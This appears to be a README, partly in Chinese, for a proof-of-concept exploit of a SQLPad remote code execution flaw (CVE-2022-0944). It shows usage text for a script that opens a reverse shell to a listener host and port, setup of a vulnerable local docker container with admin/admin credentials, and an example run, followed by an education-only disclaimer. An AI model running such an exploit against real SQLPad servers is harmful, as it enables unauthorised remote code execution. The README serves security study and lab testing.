针对 SQLPad RCE(CVE-2022-0944) 的概念验证漏洞利用程序
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
示例:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
本仓库包含的代码和工具仅用于教育目的,专门用于网络安全课程和学习环境。本代码作者对因使用、滥用或修改本代码而产生的任何后果不承担任何责任。本代码按“原样”提供,不附带任何明示或暗示的保证,包括但不限于对适销性或特定用途适用性的暗示保证。